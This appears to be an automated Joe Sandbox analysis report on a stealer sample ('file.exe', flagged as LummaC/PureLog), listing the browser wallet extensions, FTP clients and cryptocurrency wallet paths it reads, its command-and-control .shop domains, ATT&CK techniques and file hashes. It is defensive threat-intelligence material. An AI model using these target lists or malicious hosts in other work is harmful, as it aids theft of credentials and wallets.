Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\SFPUSAFIOL	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.0.file.exe.100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.34f9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.34f9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	39%	ReversingLabs	Win32.Trojan.Nekark
file.exe	44%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://tirepublicerj.shop:443/apiCLSID	100%	Avira URL Cloud	malware
https://tirepublicerj.shop/)	100%	Avira URL Cloud	malware
https://tirepublicerj.shop/ndows	100%	Avira URL Cloud	malware
https://tirepublicerj.shop/	100%	Avira URL Cloud	malware
https://tirepublicerj.shop/api	100%	Avira URL Cloud	malware
https://tirepublicerj.shop/9	100%	Avira URL Cloud	malware
https://tirepublicerj.shop/api8	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tirepublicerj.shop	104.21.64.1	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
https://tirepublicerj.shop/api	true	Avira URL Cloud: malware	unknown
nearycrepso.shop	false		high
rabidcowse.shop	false		high
wholersorie.shop	false		high
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://tirepublicerj.shop/9	file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.entrust.net03	file.exe	false		high
http://ocsp.entrust.net02	file.exe	false		high
http://www.entrust.net/rpa03	file.exe	false		high
http://aia.entrust.net/ts1-chain256.cer01	file.exe	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://tirepublicerj.shop:443/apiCLSID	file.exe, 00000002.00000002.1878711714.00000000011D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://tirepublicerj.shop/	file.exe, 00000002.00000002.1879224589.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878661592.00000000011BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://tirepublicerj.shop/)	file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/ts1ca.crl0	file.exe	false		high
https://tirepublicerj.shop/ndows	file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/2048ca.crl0	file.exe	false		high
https://www.entrust.net/rpa0	file.exe	false		high
https://tirepublicerj.shop/api8	file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.64.1	tirepublicerj.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584228
Start date and time:	2025-01-04 22:57:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 37 Number of non-executed functions: 104
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20, 40.126.32.136, 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:58:07	API Interceptor	7x Sleep call for process: file.exe modified
16:58:28	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.64.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
104.21.64.1	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	SOElePqvtf.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	m4lz5aeAiN.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	ehD7zv3l4U.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	9g9LZNE4bH.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	riFSkYVMKB.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	9cOUjp7ybm.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	http://livedashboardkit.info	Get hash	malicious	Unknown	Browse	172.67.166.199

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	J18zxRjOes.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	ZxSWvC0Tz7.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	SOElePqvtf.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	m4lz5aeAiN.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	ehD7zv3l4U.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	rdFy6abQ61.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	9cOUjp7ybm.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	random.exe	Get hash	malicious	Unknown	Browse	104.21.64.1
	random.exe	Get hash	malicious	Unknown	Browse	104.21.64.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_6fc0c6414e325294145af42a306ed092fe2ab813_fef88e97_35b9d2f3-f8fe-4576-80ac-97efb64f4355\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8843944994528008
Encrypted:	false
SSDEEP:	192:Pg6BuZv5PxA0LR3VIxaGGzuiFcyZ24IO8yB:YoG55bLR38aHzuiFcyY4IO8i
MD5:	5E97E250F5B90218E5B1E749CA569A92
SHA1:	CD77A9BD82EBEB5D9D270499B547CA7D8C53034B
SHA-256:	3D7F83E3EBBF79708A521F35782AA8481489DD84689C824127FB1F0B755CF689
SHA-512:	627EB8C36F475229B37A79BD05ACC7D5AE2C137DAA5B6D3089C9DE06C33EF2A5CDC1172651F2E1AEFF39F56AC1644BB85E4E480B3BD8B91B4432175A89C81C48
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.5.0.1.4.8.6.7.2.8.8.7.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.5.0.1.4.8.7.2.2.8.8.7.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.b.9.d.2.f.3.-.f.8.f.e.-.4.5.7.6.-.8.0.a.c.-.9.7.e.f.b.6.4.f.4.3.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.e.c.9.7.5.f.-.6.3.a.9.-.4.5.2.7.-.9.a.7.3.-.3.9.9.7.6.9.6.7.c.8.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.6.0.-.0.0.0.1.-.0.0.1.4.-.5.7.9.c.-.e.7.b.b.f.3.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.a.e.4.6.d.c.c.7.a.7.7.1.c.7.a.d.f.1.6.1.d.d.d.0.f.4.8.b.6.b.5.b.5.f.2.2.b.f.d.a.!.f.i.l.e...e.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREBF6.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jan 4 21:58:06 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	153012
Entropy (8bit):	3.7291700678866038
Encrypted:	false
SSDEEP:	1536:aKqs1UuBojR+pN4uE2aOuKLTgNAR7ZMtT1tbsCDNcOoOV4Z:5qs1wI4uEq/LTgkwBB/oOV4
MD5:	21329B7956618E4D438785662BBE53DE
SHA1:	74CE125156EB344DC44CD160AB9B6876E5AF53EE
SHA-256:	CA214AFD35711718C699DDC92468C999E4ECD692BE3C5ACF5B8DB3755A67815F
SHA-512:	B0910FDDD5113F345BF3E63ECB50C390A8B29BA284A1DCE22BD5689CC64FD7E350A1F5AE9077E4FD5ED4E7BFD15C7A79FB7EFF94E993D99AC94BC778FAD5EE1D
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........yg....................................$................/..........`.......8...........T............$...1......................................................................................................eJ......P.......GenuineIntel............T.......`....yg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED20.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8356
Entropy (8bit):	3.688024919952929
Encrypted:	false
SSDEEP:	192:R6l7wVeJ3CjH6c6Y9QSUTnYgmf6VVJ3prj89bnbZsfstjm:R6lXJEH6c6YKSUTnYgmf8VJunbyfK6
MD5:	698564804E7E81093D9A200E16830F0F
SHA1:	37DC11F0AC2C373FF86E37CF512DDFE9D25BD9F8
SHA-256:	F8B520C6A974E0790ABFF8380A97AF0B9A78FF6A5B036E22F12B1F3B18614B76
SHA-512:	08324641798F5428A2FED0B524B1877684D66F68968BCD6CEA20AB62691EFC004B1FD737A6DA116B684489558EEB4B9DC0AF4EBAA3BCA26F1B24F030EEE1622A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERED4F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	4.428868521094459
Encrypted:	false
SSDEEP:	48:cvIwWl8zsmhJg77aI9yVWpW8VYtYm8M4JtR0dxPcf6FKo+q8vER0dxPcfvQQlBFd:uIjfII74k7V1JtRlf+KERlfoQlBFd
MD5:	67429910F17DDF9E51B49593A26D3E89
SHA1:	1A288451ED25FB441BB0DCB47B2B590094931396
SHA-256:	85BF9A26425C710F1BA3D6FCACCC258669EE8BD95865BC506B55FB90FAD49FEC
SHA-512:	3CC696675BA03076F3DFD4BAD7B72F149075B7B4C28B5308824FC51994AC90AA90D33FA5B24D240904E60611A9F88145FF1F636D33F383EFBFC09FA4B12E7F3A
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="661740" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4655873110375905
Encrypted:	false
SSDEEP:	6144:eIXfpi67eLPU9skLmb0b40WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb1m:zXD940WlLZMM6YFH1+1m
MD5:	68966FD0980199EFDFE1999D24E4786B
SHA1:	C5953B62EA8E5B1DCBE8CB8C52F9D37660A623B1
SHA-256:	C856470B5EE731A2AE84BE6FBDEC705B0C0F66D94103A0ED86DC0BCEE0AF4D4B
SHA-512:	A5698EF42A51C4091A1F2E01503057512DF5E4D280C4BD8E8F71DBDCB6A2178E783A8AA61815E6E91AEF7F2EB43223091F767ED8FA7E2E0B27F4744A6CD53BFD
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..F..^................................................................................................................................................................................................................................................................................................................................................Q.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.898283829047742
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	390'696 bytes
MD5:	e9f13d0b330a73ece569b6115d2ac4f0
SHA1:	ae46dcc7a771c7adf161ddd0f48b6b5b5f22bfda
SHA256:	9c4afe3e68312e44bbaa3f122a251bb087f72d94adf8d432bdd8382087086c92
SHA512:	d1281ae02e0430d01339213c737c3aec2675b6a6983d6da170bc0afcaee1b70a89b654baa250d7e69211219f315a28ec22b5f7faa1ea5382144e7a85630bc267
SSDEEP:	6144:72pwktDrDuMt4Bgj04zLS/70E7IodJ6vsVzsooEAPmIV49g2/GzrtXAlGSIxj76o:L4Cj45zA7Fv6vsVOzm9t/Gzr9AsVP6Qt
TLSH:	CA8402092BC48320C5D4263291E34D211FE6B6576AF3EA89BDC545EB0A46FE05E4BBDC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...AL................0.................. ........@.. .......................@............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

